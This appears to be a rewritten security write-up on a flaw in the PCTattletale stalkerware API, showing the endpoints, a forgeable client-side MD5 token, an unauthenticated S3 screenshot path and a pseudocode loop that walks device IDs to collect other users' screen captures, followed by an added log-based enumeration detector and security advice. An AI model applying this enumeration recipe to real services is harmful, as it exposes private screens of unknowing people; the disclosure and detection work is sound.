PCTattletale is a stalkerware app that, once granted the permissions it asks for, records screen captures of the device it is installed on. It supports both Android and Windows. The recordings are uploaded to an online portal where the person who installed it can view them in a browser.
A recent discovery revealed a significant vulnerability in the PCTattletale API that makes it possible to obtain the latest screen capture from any device running the application. This is a separate issue from the Insecure Direct Object Reference (IDOR) vulnerability previously found by Jo Coscia and covered by TechCrunch journalist Zack Whittaker.
This summary details the steps typically involved in exploiting the vulnerability, including:
- Setting up an account.
- Installation of the app on a target device.
- Retrieving screen captures from different devices.
- Script creation to exploit the vulnerability effectively.
Part 0: Setup
To begin, an account is created on the PCTattletale website, which generates an API key. After account creation, an APK is installed on the target device.
```HTTP
METHOD: POST
URL: https://p200wi0b00.execute-api.us-east-2.amazonaws.com/Prod/api/pctt/member/
```
Sample headers and response showing initial account setup, including the API key.
Part 1: Screenshot IDOR
For each connected device, a thumbnail of the latest screen capture is displayed. Inspecting where that thumbnail is loaded from shows that the app retrieves screenshots straight from an S3 bucket using a predictable path, i.e. an insecure direct object reference.
Method to Retrieve Screen Captures
```HTTP
METHOD: GET
URL: https://pctattletalev2.s3-accelerate.amazonaws.com/{deviceID}/{date}/{timestamp}.jpg
```
No authentication is required for this access, making it a straightforward IDOR.
Part 2: Finding the Latest Screenshot
The device overview displays the latest screenshot as a thumbnail; watching the request that loads it shows the capture is fetched through a specific POST request to the API:
```HTTP
METHOD: POST
URL: https://5uw7yeva9g.execute-api.us-east-2.amazonaws.com/Prod/api/pctt/member/{APIKey}/{deviceID}/Live/
```
The request carries a token, and the response provides the URL of the most recent screenshot.
Part 3: Client-Side Token Generation
The token used in API requests is generated on the client side by appending the device ID to the API key and running the result through the MD5 hashing algorithm. Since both inputs already appear in the request URL, the token proves nothing the server does not already have, and any caller can recreate a valid token for a device they do not own.
Token Generation Code
```javascript
// Client-side token generation as shipped in the web portal.
// The token is derived only from values the caller already knows.
function updateDevice(device, index) {
  var deviceToken = md5(API_KEY + "" + device.DeviceID);
  $.ajax({
    method: "POST",
    crossDomain: true,
    contentType: "application/json",
    dataType: "json",
    url: AWS_BASE_URL_LIVE + "api/pctt/member/" + API_KEY + "/" + device.DeviceID + "/Live/",
    data: JSON.stringify({Token: deviceToken})
  });
}
```
Part 4: Exploiting Faith
Using a generated token with a neighbouring device ID confirms that the API returns the capture for any device: it checks that the token matches the MD5 recipe but never checks that the device belongs to the account making the request.
Part 5: Putting Together an Exploit Script
By utilizing the client-side token generation discovery and API access paths, an automated script can be developed to exploit this vulnerability systematically and retrieve screen captures.
```python
# Sample pseudocode for the exploit script (helper names are placeholders)
for device_id in range(valid_start, valid_end):
    screenshot = requests.get(screenshot_url.format(device_id))
    if valid_response(screenshot):
        save_screenshot(screenshot)
```
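The script above walks device IDs in sequence, and because the vulnerable API answered 200 for every device, status codes alone would not reveal it. As an added example (not vendor code and not from the original write-up), the Node.js detector below parses constructed API access-log lines in the shape of the `/Live/` endpoint from Part 2 and flags any API key that touches an unusual number of distinct device IDs within a short window, noting when those IDs are contiguous. The log format, timestamps, key names and thresholds are all constructed for the demo; adapt the regex to your gateway's access-log format.

```javascript
// Added example, not vendor code: spotting device-ID enumeration in access logs.
// Constructed sample log: "<iso-time> <apiKey> POST <path> <status>".
// Alice checks her own two devices; key-eve-0009 walks six consecutive IDs.
const SAMPLE_LOG = `
2024-05-01T10:00:01Z key-alice-0001 POST /Prod/api/pctt/member/key-alice-0001/1001/Live/ 200
2024-05-01T10:00:05Z key-alice-0001 POST /Prod/api/pctt/member/key-alice-0001/1002/Live/ 200
2024-05-01T10:01:00Z key-eve-0009 POST /Prod/api/pctt/member/key-eve-0009/2000/Live/ 200
2024-05-01T10:01:10Z key-eve-0009 POST /Prod/api/pctt/member/key-eve-0009/2001/Live/ 200
2024-05-01T10:01:20Z key-eve-0009 POST /Prod/api/pctt/member/key-eve-0009/2002/Live/ 200
2024-05-01T10:01:30Z key-eve-0009 POST /Prod/api/pctt/member/key-eve-0009/2003/Live/ 200
2024-05-01T10:01:40Z key-eve-0009 POST /Prod/api/pctt/member/key-eve-0009/2004/Live/ 200
2024-05-01T10:01:50Z key-eve-0009 POST /Prod/api/pctt/member/key-eve-0009/2005/Live/ 200
2024-05-01T10:02:00Z key-bob-0002 POST /Prod/api/pctt/member/key-bob-0002/1003/Live/ 200
`;

// Matches the constructed format; captures time, API key, device ID, status.
const LINE_RE = /^(\S+) (\S+) POST \/Prod\/api\/pctt\/member\/[^/]+\/(\d+)\/Live\/ (\d{3})$/;

function parseLog(text) {
  const events = [];
  for (const raw of text.split("\n")) {
    const m = LINE_RE.exec(raw.trim());
    if (!m) continue; // skip blank or unrelated lines
    events.push({
      t: Date.parse(m[1]) / 1000,
      apiKey: m[2],
      deviceId: Number(m[3]),
      status: Number(m[4]), // kept for completeness; every probe here returned 200
    });
  }
  return events;
}

// Sliding window per API key: report the largest set of distinct device IDs
// one key requested within windowSec, and alert when it reaches threshold.
function detectEnumeration(events, { windowSec = 300, threshold = 5 } = {}) {
  const byKey = new Map();
  for (const e of events) {
    if (!byKey.has(e.apiKey)) byKey.set(e.apiKey, []);
    byKey.get(e.apiKey).push(e);
  }
  const alerts = [];
  for (const [apiKey, evs] of byKey) {
    evs.sort((a, b) => a.t - b.t);
    let best = { ids: new Set(), lo: 0, hi: 0 };
    let lo = 0;
    for (let hi = 0; hi < evs.length; hi++) {
      while (evs[hi].t - evs[lo].t > windowSec) lo++;
      const ids = new Set(evs.slice(lo, hi + 1).map((e) => e.deviceId));
      if (ids.size > best.ids.size) best = { ids, lo, hi };
    }
    if (best.ids.size >= threshold) {
      const sorted = [...best.ids].sort((a, b) => a - b);
      // Contiguous IDs are a strong hint of a range(start, end) style walk.
      const sequential = sorted[sorted.length - 1] - sorted[0] + 1 === sorted.length;
      alerts.push({
        apiKey,
        distinctDevices: best.ids.size,
        sequential,
        firstSeen: evs[best.lo].t,
        lastSeen: evs[best.hi].t,
      });
    }
  }
  return alerts;
}

module.exports = { SAMPLE_LOG, parseLog, detectEnumeration };
```

On the sample log this yields a single alert for `key-eve-0009` covering six contiguous device IDs in under a minute, while the two legitimate keys stay below the threshold. In production the threshold should come from the per-account device count, since a real user rarely polls more devices than they own.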
Part 6: Aftermath
Following the exposure of the vulnerability, scrutiny intensified and Amazon blocked the entire PCTattletale AWS infrastructure. Further details, including technical appendices explaining the exploit, are available on maia arson crimew's blog.
Remember these 3 key ideas for your startup:
- Emphasize Security: Always prioritize secure development practices and regular audits to avoid vulnerabilities that could compromise user data.
- Rapid Response: Be proactive in responding to vulnerabilities reported by researchers to maintain credibility and user trust.
- Client-Side Validation: Avoid client-side token generation for critical application features; always use secure server-side validation.
For more details, see the original source
Implementing these strategies can ensure the integrity, trust, and robustness of your tech solutions. Stay informed and updated to shield your startup from potential security threats.